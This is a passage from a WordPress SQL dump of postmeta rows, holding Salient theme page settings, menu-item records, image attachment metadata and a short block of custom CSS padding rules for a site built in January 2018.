,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(7492,6593,'_wp_page_template','default'),(7493,6593,'nectar-metabox-portfolio-display','a:1:{i:0;s:3:\"all\";}'),(7494,6593,'nectar-metabox-portfolio-display-sortable','off'),(7495,6593,'_nectar_full_screen_rows','off'),(7496,6593,'_nectar_full_screen_rows_animation','none'),(7497,6593,'_nectar_full_screen_rows_animation_speed','medium'),(7498,6593,'_nectar_full_screen_rows_overall_bg_color',''),(7499,6593,'_nectar_full_screen_rows_anchors','off'),(7500,6593,'_nectar_full_screen_rows_mobile_disable','off'),(7501,6593,'_nectar_full_screen_rows_row_bg_animation','none'),(7502,6593,'_nectar_full_screen_rows_dot_navigation','tooltip'),(7503,6593,'_nectar_full_screen_rows_content_overflow','scrollbar'),(7504,6593,'_nectar_full_screen_rows_footer','none'),(7505,6593,'_nectar_slider_bg_type','image_bg'),(7506,6593,'_nectar_canvas_shapes',''),(7507,6593,'_nectar_media_upload_webm',''),(7508,6593,'_nectar_media_upload_mp4',''),(7509,6593,'_nectar_media_upload_ogv',''),(7510,6593,'_nectar_slider_preview_image',''),(7511,6593,'_nectar_header_bg',''),(7512,6593,'_nectar_header_parallax','off'),(7513,6593,'_nectar_header_box_roll','off'),(7514,6593,'_nectar_header_bg_height',''),(7515,6593,'_nectar_header_fullscreen','off'),(7516,6593,'_nectar_header_title',''),(7517,6593,'_nectar_header_subtitle',''),(7518,6593,'_nectar_page_header_text-effect','none'),(7519,6593,'_nectar_particle_rotation_timing',''),(7520,6593,'_nectar_particle_disable_explosion','off'),(7521,6593,'_nectar_page_header_alignment','left'),(7522,6593,'_nectar_page_header_alignment_v','middle'),(7523,6593,'_nectar_page_header_bg_alignment','center'),(7524,6593,'_nectar_header_bg_color',''),(7525,6593,'_nectar_header_font_color',''),(7526,6593,'_nectar_header_bg_overlay_color',''),(7527,6593,'_disable_transparent_header','off'),(7528,6593,'_force_transparent_header','off'),(7529,6593,'_wpb_vc_js_status','false'),(7531,6593,'_dp_original','6293'),(7532,6593,'_edit_lock','1514955453:1'),(7533,6593,'_edit_last','1'),(7534,6595,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(7535,6595,'_menu_item_type','post_type'),(7536,6595,'_menu_item_menu_item_parent','6295'),(7537,6595,'_menu_item_object_id','6593'),(7538,6595,'_menu_item_object','page'),(7539,6595,'_menu_item_target',''),(7540,6595,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(7541,6595,'_menu_item_xfn',''),(7542,6595,'_menu_item_url',''),(7544,6596,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(7545,6596,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(7546,6596,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(7547,6596,'_wp_page_template','default'),(7548,6596,'nectar-metabox-portfolio-display','a:1:{i:0;s:3:\"all\";}'),(7549,6596,'nectar-metabox-portfolio-display-sortable','off'),(7550,6596,'_nectar_full_screen_rows','off'),(7551,6596,'_nectar_full_screen_rows_animation','none'),(7552,6596,'_nectar_full_screen_rows_animation_speed','medium'),(7553,6596,'_nectar_full_screen_rows_overall_bg_color',''),(7554,6596,'_nectar_full_screen_rows_anchors','off'),(7555,6596,'_nectar_full_screen_rows_mobile_disable','off'),(7556,6596,'_nectar_full_screen_rows_row_bg_animation','none'),(7557,6596,'_nectar_full_screen_rows_dot_navigation','tooltip'),(7558,6596,'_nectar_full_screen_rows_content_overflow','scrollbar'),(7559,6596,'_nectar_full_screen_rows_footer','none'),(7560,6596,'_nectar_slider_bg_type','image_bg'),(7561,6596,'_nectar_canvas_shapes',''),(7562,6596,'_nectar_media_upload_webm',''),(7563,6596,'_nectar_media_upload_mp4',''),(7564,6596,'_nectar_media_upload_ogv',''),(7565,6596,'_nectar_slider_preview_image',''),(7566,6596,'_nectar_header_bg',''),(7567,6596,'_nectar_header_parallax','off'),(7568,6596,'_nectar_header_box_roll','off'),(7569,6596,'_nectar_header_bg_height',''),(7570,6596,'_nectar_header_fullscreen','off'),(7571,6596,'_nectar_header_title',''),(7572,6596,'_nectar_header_subtitle',''),(7573,6596,'_nectar_page_header_text-effect','none'),(7574,6596,'_nectar_particle_rotation_timing',''),(7575,6596,'_nectar_particle_disable_explosion','off'),(7576,6596,'_nectar_page_header_alignment','left'),(7577,6596,'_nectar_page_header_alignment_v','middle'),(7578,6596,'_nectar_page_header_bg_alignment','center'),(7579,6596,'_nectar_header_bg_color',''),(7580,6596,'_nectar_header_font_color',''),(7581,6596,'_nectar_header_bg_overlay_color',''),(7582,6596,'_disable_transparent_header','off'),(7583,6596,'_force_transparent_header','off'),(7584,6596,'_wpb_vc_js_status','false'),(7586,6596,'_dp_original','6320'),(7587,6596,'_edit_lock','1514955532:1'),(7588,6596,'_edit_last','1'),(7589,6598,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(7590,6598,'_menu_item_type','post_type'),(7591,6598,'_menu_item_menu_item_parent','6350'),(7592,6598,'_menu_item_object_id','6596'),(7593,6598,'_menu_item_object','page'),(7594,6598,'_menu_item_target',''),(7595,6598,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(7596,6598,'_menu_item_xfn',''),(7597,6598,'_menu_item_url',''),(7599,6599,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(7600,6599,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(7601,6599,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(7602,6599,'_wp_page_template','default'),(7603,6599,'nectar-metabox-portfolio-display','a:1:{i:0;s:3:\"all\";}'),(7604,6599,'nectar-metabox-portfolio-display-sortable','off'),(7605,6599,'_nectar_full_screen_rows','off'),(7606,6599,'_nectar_full_screen_rows_animation','none'),(7607,6599,'_nectar_full_screen_rows_animation_speed','medium'),(7608,6599,'_nectar_full_screen_rows_overall_bg_color',''),(7609,6599,'_nectar_full_screen_rows_anchors','off'),(7610,6599,'_nectar_full_screen_rows_mobile_disable','off'),(7611,6599,'_nectar_full_screen_rows_row_bg_animation','none'),(7612,6599,'_nectar_full_screen_rows_dot_navigation','tooltip'),(7613,6599,'_nectar_full_screen_rows_content_overflow','scrollbar'),(7614,6599,'_nectar_full_screen_rows_footer','none'),(7615,6599,'_nectar_slider_bg_type','image_bg'),(7616,6599,'_nectar_canvas_shapes',''),(7617,6599,'_nectar_media_upload_webm',''),(7618,6599,'_nectar_media_upload_mp4',''),(7619,6599,'_nectar_media_upload_ogv',''),(7620,6599,'_nectar_slider_preview_image',''),(7621,6599,'_nectar_header_bg',''),(7622,6599,'_nectar_header_parallax','off'),(7623,6599,'_nectar_header_box_roll','off'),(7624,6599,'_nectar_header_bg_height',''),(7625,6599,'_nectar_header_fullscreen','off'),(7626,6599,'_nectar_header_title',''),(7627,6599,'_nectar_header_subtitle',''),(7628,6599,'_nectar_page_header_text-effect','none'),(7629,6599,'_nectar_particle_rotation_timing',''),(7630,6599,'_nectar_particle_disable_explosion','off'),(7631,6599,'_nectar_page_header_alignment','left'),(7632,6599,'_nectar_page_header_alignment_v','middle'),(7633,6599,'_nectar_page_header_bg_alignment','center'),(7634,6599,'_nectar_header_bg_color',''),(7635,6599,'_nectar_header_font_color',''),(7636,6599,'_nectar_header_bg_overlay_color',''),(7637,6599,'_disable_transparent_header','off'),(7638,6599,'_force_transparent_header','off'),(7639,6599,'_wpb_vc_js_status','false'),(7641,6599,'_dp_original','6320'),(7642,6599,'_edit_lock','1514955609:1'),(7643,6599,'_edit_last','1'),(7644,6602,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(7645,6602,'_menu_item_type','post_type'),(7646,6602,'_menu_item_menu_item_parent','6350'),(7647,6602,'_menu_item_object_id','6599'),(7648,6602,'_menu_item_object','page'),(7649,6602,'_menu_item_target',''),(7650,6602,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(7651,6602,'_menu_item_xfn',''),(7652,6602,'_menu_item_url',''),(7654,6603,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(7655,6603,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(7656,6603,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(7657,6603,'_wp_page_template','default'),(7658,6603,'nectar-metabox-portfolio-display','a:1:{i:0;s:3:\"all\";}'),(7659,6603,'nectar-metabox-portfolio-display-sortable','off'),(7660,6603,'_nectar_full_screen_rows','off'),(7661,6603,'_nectar_full_screen_rows_animation','none'),(7662,6603,'_nectar_full_screen_rows_animation_speed','medium'),(7663,6603,'_nectar_full_screen_rows_overall_bg_color',''),(7664,6603,'_nectar_full_screen_rows_anchors','off'),(7665,6603,'_nectar_full_screen_rows_mobile_disable','off'),(7666,6603,'_nectar_full_screen_rows_row_bg_animation','none'),(7667,6603,'_nectar_full_screen_rows_dot_navigation','tooltip'),(7668,6603,'_nectar_full_screen_rows_content_overflow','scrollbar'),(7669,6603,'_nectar_full_screen_rows_footer','none'),(7670,6603,'_nectar_slider_bg_type','image_bg'),(7671,6603,'_nectar_canvas_shapes',''),(7672,6603,'_nectar_media_upload_webm',''),(7673,6603,'_nectar_media_upload_mp4',''),(7674,6603,'_nectar_media_upload_ogv',''),(7675,6603,'_nectar_slider_preview_image',''),(7676,6603,'_nectar_header_bg',''),(7677,6603,'_nectar_header_parallax','off'),(7678,6603,'_nectar_header_box_roll','off'),(7679,6603,'_nectar_header_bg_height',''),(7680,6603,'_nectar_header_fullscreen','off'),(7681,6603,'_nectar_header_title',''),(7682,6603,'_nectar_header_subtitle',''),(7683,6603,'_nectar_page_header_text-effect','none'),(7684,6603,'_nectar_particle_rotation_timing',''),(7685,6603,'_nectar_particle_disable_explosion','off'),(7686,6603,'_nectar_page_header_alignment','left'),(7687,6603,'_nectar_page_header_alignment_v','middle'),(7688,6603,'_nectar_page_header_bg_alignment','center'),(7689,6603,'_nectar_header_bg_color',''),(7690,6603,'_nectar_header_font_color',''),(7691,6603,'_nectar_header_bg_overlay_color',''),(7692,6603,'_disable_transparent_header','off'),(7693,6603,'_force_transparent_header','off'),(7694,6603,'_wpb_vc_js_status','false'),(7696,6603,'_dp_original','6320'),(7697,6603,'_edit_lock','1514955689:1'),(7698,6603,'_edit_last','1'),(7699,6605,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(7700,6605,'_menu_item_type','post_type'),(7701,6605,'_menu_item_menu_item_parent','6350'),(7702,6605,'_menu_item_object_id','6603'),(7703,6605,'_menu_item_object','page'),(7704,6605,'_menu_item_target',''),(7705,6605,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(7706,6605,'_menu_item_xfn',''),(7707,6605,'_menu_item_url',''),(7711,6612,'_wp_attached_file','2018/01/bg-main.jpg'),(7712,6612,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:1600;s:6:\"height\";i:1067;s:4:\"file\";s:19:\"2018/01/bg-main.jpg\";s:5:\"sizes\";a:17:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:19:\"bg-main-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:19:\"bg-main-300x200.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:200;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:19:\"bg-main-768x512.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:512;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:20:\"bg-main-1024x683.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:683;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:15:\"portfolio-thumb\";a:4:{s:4:\"file\";s:19:\"bg-main-600x403.jpg\";s:5:\"width\";i:600;s:6:\"height\";i:403;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:21:\"portfolio-thumb_small\";a:4:{s:4:\"file\";s:19:\"bg-main-400x269.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:269;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:16:\"portfolio-widget\";a:4:{s:4:\"file\";s:19:\"bg-main-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:19:\"nectar_small_square\";a:4:{s:4:\"file\";s:19:\"bg-main-140x140.jpg\";s:5:\"width\";i:140;s:6:\"height\";i:140;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:4:\"wide\";a:4:{s:4:\"file\";s:20:\"bg-main-1000x500.jpg\";s:5:\"width\";i:1000;s:6:\"height\";i:500;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"wide_small\";a:4:{s:4:\"file\";s:19:\"bg-main-670x335.jpg\";s:5:\"width\";i:670;s:6:\"height\";i:335;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:7:\"regular\";a:4:{s:4:\"file\";s:19:\"bg-main-500x500.jpg\";s:5:\"width\";i:500;s:6:\"height\";i:500;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:13:\"regular_small\";a:4:{s:4:\"file\";s:19:\"bg-main-350x350.jpg\";s:5:\"width\";i:350;s:6:\"height\";i:350;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:4:\"tall\";a:4:{s:4:\"file\";s:20:\"bg-main-500x1000.jpg\";s:5:\"width\";i:500;s:6:\"height\";i:1000;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"wide_tall\";a:4:{s:4:\"file\";s:21:\"bg-main-1000x1000.jpg\";s:5:\"width\";i:1000;s:6:\"height\";i:1000;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:16:\"wide_photography\";a:4:{s:4:\"file\";s:19:\"bg-main-900x600.jpg\";s:5:\"width\";i:900;s:6:\"height\";i:600;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:14:\"large_featured\";a:4:{s:4:\"file\";s:20:\"bg-main-1600x700.jpg\";s:5:\"width\";i:1600;s:6:\"height\";i:700;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:15:\"medium_featured\";a:4:{s:4:\"file\";s:19:\"bg-main-800x800.jpg\";s:5:\"width\";i:800;s:6:\"height\";i:800;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(7713,6619,'_wp_attached_file','2018/01/bg-top.jpg'),(7714,6619,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:1600;s:6:\"height\";i:1067;s:4:\"file\";s:18:\"2018/01/bg-top.jpg\";s:5:\"sizes\";a:17:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:18:\"bg-top-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:18:\"bg-top-300x200.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:200;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:18:\"bg-top-768x512.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:512;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:19:\"bg-top-1024x683.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:683;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:15:\"portfolio-thumb\";a:4:{s:4:\"file\";s:18:\"bg-top-600x403.jpg\";s:5:\"width\";i:600;s:6:\"height\";i:403;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:21:\"portfolio-thumb_small\";a:4:{s:4:\"file\";s:18:\"bg-top-400x269.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:269;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:16:\"portfolio-widget\";a:4:{s:4:\"file\";s:18:\"bg-top-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:19:\"nectar_small_square\";a:4:{s:4:\"file\";s:18:\"bg-top-140x140.jpg\";s:5:\"width\";i:140;s:6:\"height\";i:140;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:4:\"wide\";a:4:{s:4:\"file\";s:19:\"bg-top-1000x500.jpg\";s:5:\"width\";i:1000;s:6:\"height\";i:500;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"wide_small\";a:4:{s:4:\"file\";s:18:\"bg-top-670x335.jpg\";s:5:\"width\";i:670;s:6:\"height\";i:335;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:7:\"regular\";a:4:{s:4:\"file\";s:18:\"bg-top-500x500.jpg\";s:5:\"width\";i:500;s:6:\"height\";i:500;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:13:\"regular_small\";a:4:{s:4:\"file\";s:18:\"bg-top-350x350.jpg\";s:5:\"width\";i:350;s:6:\"height\";i:350;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:4:\"tall\";a:4:{s:4:\"file\";s:19:\"bg-top-500x1000.jpg\";s:5:\"width\";i:500;s:6:\"height\";i:1000;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"wide_tall\";a:4:{s:4:\"file\";s:20:\"bg-top-1000x1000.jpg\";s:5:\"width\";i:1000;s:6:\"height\";i:1000;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:16:\"wide_photography\";a:4:{s:4:\"file\";s:18:\"bg-top-900x600.jpg\";s:5:\"width\";i:900;s:6:\"height\";i:600;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:14:\"large_featured\";a:4:{s:4:\"file\";s:19:\"bg-top-1600x700.jpg\";s:5:\"width\";i:1600;s:6:\"height\";i:700;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:15:\"medium_featured\";a:4:{s:4:\"file\";s:18:\"bg-top-800x800.jpg\";s:5:\"width\";i:800;s:6:\"height\";i:800;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(7715,6269,'_wpb_shortcodes_custom_css','.vc_custom_1515632507253{padding-top: 20px !important;padding-bottom: 20px !important;}.vc_custom_1515633262229{padding-top: 15px !important;padding-right: 15px !important;padding-bottom: 15px !important;padding-left: 15px !important;}.vc_custom_1515633293772{padding-top: 15px !important;padding-right: 15px !important;padding-bottom: 15px !important;padding-left: 15px !important;}.vc_custom_1515633307261{padding-top: 15px !important;padding-right: 15px !important;padding-bottom: 15px !important;padding-left: 15px !important;}'),(7716,6634,'_wp_attached_file','2018/01/IMG_8407.jpg'),(7717,6634,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:720;s:6:\"height\";i:480;s:4:\"file\";s:20:\"2018/01/IMG_8407.jpg\";s:5:\"sizes\";a:10:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:20:\"IMG_8407-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:20:\"IMG_8407-300x200.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:200;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:15:\"portfolio-thumb\";a:4:{s:4:\"file\";s:20:\"IMG_8407-600x403.jpg\";s:5:\"width\";i:600;s:6:\"height\";i:403;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:21:\"portfolio-thumb_small\";a:4:{s:4:\"file\";s:20:\"IMG_8407-400x269.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:269;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:16:\"portfolio-widget\";a:4:{s:4:\"file\";s:20:\"IMG_8407-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:19:\"nectar_small_square\";a:4:{s:4:\"file\";s:20:\"IMG_8407-140x140.jpg\";s:5:\"width\";i:140;s:6:\"height\";i:140;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"wide_small\";a:4:{s:4:\"file\";s:20:\"IMG_8407-670x335.jpg\";s:5:\"width\";i:670;s:6:\"height\";i:335;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:7:\"regular\";a:4:{s:4:\"file\";s:20:\"IMG_8407-500x480.jpg\";s:5:\"width\";i:500;s:6:\"height\";i:480;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:13:\"regular_small\";a:4:{s:4:\"file\";s:20:\"IMG_8407-350x350.jpg\";s:5:\"width\";i:350;s:6:\"height\";i:350;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:4:\"tall\";a:4:{s:4:\"file\";s:20:\"IMG_8407-500x480.jpg\";s:5:\"width\";i:500;s:6:\"height\";i:480;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:3:\"5.6\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:14:\"Canon EOS 700D\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:10:\"1487868073\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:2:\"47\";s:3:\"iso\";s:4:\"1600\";s:13:\"shutter_speed\";s:6:\"0.0125\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"1\";s:8:\"keywords\";a:0:{}}}'),(7719,6644,'_wp_attached_file','2018/01/dg.jpg'),(7720,6644,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:800;s:6:\"height\";i:533;s:4:\"file\";s:14:\"2018/01/dg.jpg\";s:5:\"sizes\";a:13:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:14:\"dg-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:14:\"dg-300x200.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:200;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:14:\"dg-768x512.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:512;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:15:\"portfolio-thumb\";a:4:{s:4:\"file\";s:14:\"dg-600x403.jpg\";s:5:\"width\";i:600;s:6:\"height\";i:403;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:21:\"portfolio-thumb_small\";a:4:{s:4:\"file\";s:14:\"dg-400x269.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:269;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:16:\"portfolio-widget\";a:4:{s:4:\"file\";s:14:\"dg-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:19:\"nectar_small_square\";a:4:{s:4:\"file\";s:14:\"dg-140x140.jpg\";s:5:\"width\";i:140;s:6:\"height\";i:140;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:4:\"wide\";a:4:{s:4:\"file\";s:14:\"dg-800x500.jpg\";s:5:\"width\";i:800;s:6:\"height\";i:500;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"wide_small\";a:4:{s:4:\"file\";s:14:\"dg-670x335.jpg\";s:5:\"width\";i:670;s:6:\"height\";i:335;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:7:\"regular\";a:4:{s:4:\"file\";s:14:\"dg-500x500.jpg\";s:5:\"width\";i:500;s:6:\"height\";i:500;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:13:\"regular_small\";a:4:{s:4:\"file\";s:14:\"dg-350x350.jpg\";s:5:\"width\";i:350;s:6:\"height\";i:350;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:4:\"tall\";a:4:{s:4:\"file\";s:14:\"dg-500x533.jpg\";s:5:\"width\";i:500;s:6:\"height\";i:533;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:15:\"medium_featured\";a:4:{s:4:\"file\";s:14:\"dg-800x533.jpg\";s:5:\"width\";i:800;s:6:\"height\";i:533;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(7721,25,'_edit_lock','1515647369:1'),(7722,25,'_edit_last','1'),(7723,25,'_nectar_full_screen_rows','off'),(7724,25,'_nectar_full_screen_rows_animation','none'),(7725,25,'_nectar_full_screen_rows_animation_speed','medium'),(7726,25,'_nectar_full_screen_rows_overall_bg_color',''),(7727,25,'_nectar_full_screen_rows_anchors','off'),(7728,25,'_nectar_full_screen_rows_mobile_disable','off'),(7729,25,'_nectar_full_screen_rows_row_bg_animation','none'),(7730,25,'_nectar_full_screen_rows_dot_navigation','tooltip'),(7731,25,'_nectar_full_screen_rows_content_overflow','scrollbar'),(7732,25,'_nectar_full_screen_rows_footer','none'),(7733,25,'_nectar_header_bg_overlay_color',''),(7736,6660,'_wp_attached_file','2018/01/ban.jpg'),(7737,6660,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:800;s:6:\"height\";i:320;s:4:\"file\";s:15:\"2018/01/ban.jpg\";s:5:\"sizes\";a:12:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:15:\"ban-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:15:\"ban-300x120.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:120;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:15:\"ban-768x307.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:307;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:15:\"portfolio-thumb\";a:4:{s:4:\"file\";s:15:\"ban-600x320.jpg\";s:5:\"width\";i:600;s:6:\"height\";i:320;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:21:\"portfolio-thumb_small\";a:4:{s:4:\"file\";s:15:\"ban-400x269.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:269;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:16:\"portfolio-widget\";a:4:{s:4:\"file\";s:15:\"ban-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:19:\"nectar_small_square\";a:4:{s:4:\"file\";s:15:\"ban-140x140.jpg\";s:5:\"width\";i:140;s:6:\"height\";i:140;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"wide_small\";a:4:{s:4:\"file\";s:15:\"ban-670x320.jpg\";s:5:\"width\";i:670;s:6:\"height\";i:320;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:7:\"regular\";a:4:{s:4:\"file\";s:15:\"ban-500x320.jpg\";s:5:\"width\";i:500;s:6:\"height\";i:320;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:13:\"regular_small\";a:4:{s:4:\"file\";s:15:\"ban-350x320.jpg\";s:5:\"width\";i:350;s:6:\"height\";i:320;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:4:\"tall\";a:4:{s:4:\"file\";s:15:\"ban-500x320.jpg\";s:5:\"width\";i:500;s:6:\"height\";i:320;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:15:\"medium_featured\";a:4:{s:4:\"file\";s:15:\"ban-800x320.jpg\";s:5:\"width\";i:800;s:6:\"height\";i:320;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(7738,6661,'_wp_attached_file','2018/01/logo-dab.png'),(7739,6661,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:215;s:6:\"height\";i:54;s:4:\"file\";s:20:\